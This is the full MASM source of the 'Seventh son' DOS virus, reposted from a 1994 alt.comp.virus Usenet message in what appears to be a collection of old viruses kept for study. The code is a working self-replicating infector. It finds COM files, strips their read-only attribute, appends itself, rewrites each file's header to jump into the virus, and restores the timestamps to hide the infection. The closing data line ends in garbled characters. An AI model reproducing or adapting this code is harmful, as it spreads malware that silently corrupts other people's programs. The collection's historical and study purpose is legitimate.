
📄 7son.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
Xref: netcom.com alt.comp.virus:506
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: 7th Son Virus
Date: 29 Nov 1994 13:02:59 GMT
Organization: Netcom
Lines: 236
Distribution: world
Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com

;****************************************************************************
;*  Seventh son of a seventh son    version 4
;*
;*  Compile with MASM 4.0
;*  (other assemblers will probably not produce the same result)
;*
;*  Disclaimer:
;*  This file is only for educational purposes. The author takes no
;*  responsibility for anything anyone does with this file. Do not
;*  modify this file!
;****************************************************************************

cseg            segment
                assume  cs:cseg,ds:cseg,es:cseg,ss:cseg

                .RADIX  16

FILELEN         equ     end - start
MINTARGET       equ     1000d
MAXTARGET       equ     -(FILELEN+40)

;****************************************************************************
;*              Dummy program (infected)
;****************************************************************************

                org     100

begin:          db      4Dh                     ;virus mark
                db      0E9h, 4, 0              ;jump to virus entry

;****************************************************************************
;*              Begin of the virus
;****************************************************************************

start:          db      0CDh,  20h, 0, 0

                cld
                mov     si,0100h
                push    si                      ;push new IP on stack
                mov     di,si
                add     si,[si+2]               ;si -> start
                push    si                      ;restore original begin
                movsw
                movsw
                pop     si

                mov     ax,3300h                ;get ctrl-break flag
                int     21
                push    dx
                cwd                             ;clear the flag
                inc     ax
                push    ax
                int     21

                mov     ax,3524h                ;get int24 vector
                int     21
                push    bx
                push    es
                lea     dx,[si+(offset ni24 - 0104)]  ;set new int24 vector
                mov     ah,25h
                push    ax
                int     21

                mov     ah,2Fh                  ;get DTA address
                int     21
                push    es
                push    bx
                add     dx,070h                 ;set new DTA address
                mov     ah,1Ah
                int     21
                add     dx,1Eh
                push    dx

                lea     di,[si+(offset generation-0104)]  ;check generation
                cmp     [di],0707h
                jne     verder
                lea     dx,[di+2]               ;7th son of a 7th son!
                mov     ah,09h
                int     21

verder:         mov     ax,[di]                 ;update generations
                xchg    ah,al
                mov     al,1
                mov     [di],ax

                lea     dx,[di+33d]             ;find first COM-file
                xor     cx,cx
                mov     ah,4Eh
infloop:        int     21
                pop     dx
                jc      stop
                push    dx

                xor     cx,cx                   ;clear read-only-attribute
                mov     ax,4301
                int     21
                jc      return1

                mov     ax,3D02h                ;open the file
                int     21
                jc      return1
                xchg    bx,ax

                mov     ax,5700h                ;get file date & time
                int     21
                push    cx
                push    dx

                mov     cx,4                    ;read begin of file
                mov     dx,si
                mov     ah,3fh
                int     21

                cmp     byte ptr [si],4Dh       ;already infected or an EXE?
                je      return2
                cmp     byte ptr [si],5Ah       ;or a weird EXE?
                je      return2

                mov     al,2                    ;go to end of file
                call    seek

                cmp     ax,MAXTARGET            ;check length of file
                jnb     return2
                cmp     ax,MINTARGET
                jbe     return2

                push    ax
                mov     cx,FILELEN              ;write program to end of file
                mov     ah,40h
                int     21
                cmp     ax,cx                   ;are all bytes written?
                pop     ax
                jnz     return2
                xchg    ax,bp

                mov     al,0                    ;go to begin of file
                call    seek

                mov     word ptr [si],0E94Dh    ;write mark and jump-command
                mov     word ptr [si+2],bp
                mov     ah,40h
                int     21

                inc     byte ptr [di]           ;number of next son

return2:        pop     dx                      ;restore file date & time
                pop     cx
                mov     ax,5701h
                int     21

                mov     ah,3Eh                  ;close the file
                int     21

return1:        mov     ah,4Fh                  ;find next file
                jmp     short infloop

stop:           pop     dx                      ;restore DTA address
                pop     ds
                mov     ah,1Ah
                int     21

                pop     ax                      ;restore int24 vector
                pop     ds
                pop     dx
                int     21

                pop     ax                      ;restore ctrl-break flag
                pop     dx
                int     21

                push    cs
                push    cs
                pop     ds
                pop     es

                ret

seek:           mov     ah,42
                cwd
int21:          xor     cx,cx
                int     21
                mov     cl,4
                mov     dx,si
                ret

;****************************************************************************
;*              Interrupt handler 24
;****************************************************************************

ni24:           mov     al,03
                iret

;****************************************************************************
;*              Data
;****************************************************************************

generation      db      1,1
sontxt          db      'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename        db      '*.COM',0
                db      '偍俺
